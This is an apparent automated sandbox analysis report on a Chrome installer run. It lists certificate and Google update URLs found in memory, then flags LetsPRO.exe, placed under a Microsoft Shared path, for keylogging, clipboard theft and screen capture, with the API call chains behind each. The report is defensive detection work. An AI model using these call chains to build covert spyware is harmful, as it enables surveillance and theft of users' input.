                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: goopdateres_ko.dll.16.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2082869846.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113272279.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114661237.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2124671357.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131161784.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104723408.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: GoogleUpdate.exeString found in binary or memory: https://clients2.google.com/cr/report
                  Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://clients2.google.com/cr/reportcheckpointGoogle
                  Source: GoogleUpdate.exeString found in binary or memory: https://clients2.google.com/service/check2?crx3=true
                  Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/check2?crx3=trueSoftware
                  Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/update2/installers/icons/https://m.google.com/devicemanagement/data/apiLastCod
                  Source: GoogleUpdate.exeString found in binary or memory: https://m.google.com/devicemanagement/data/api
                  Source: GoogleUpdate.exeString found in binary or memory: https://update.googleapis.com/service/update2
                  Source: GoogleUpdate.exe, 0000001E.00000002.3261720735.0000000000B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://update.googleapis.com/service/update22F
                  Source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://update.googleapis.com/service/update2https://www.google.com/support/installer/?
                  Source: GoogleUpdate.exeString found in binary or memory: https://www.google.com/support/installer/?
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture and log keystrokes
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: [esc]4_2_03F3E850
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: [esc]4_2_03F3E850
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: [esc]4_2_03F3E850
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: [esc]4_2_03F3E850
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F3E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,4_2_03F3E850
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCA3E5C lstrlenW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,30_2_6CCA3E5C
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F3E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,4_2_03F3E850
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F3BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,4_2_03F3BC70
                  Source: LetsPRO.exeBinary or memory string: DirectInput8Create
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
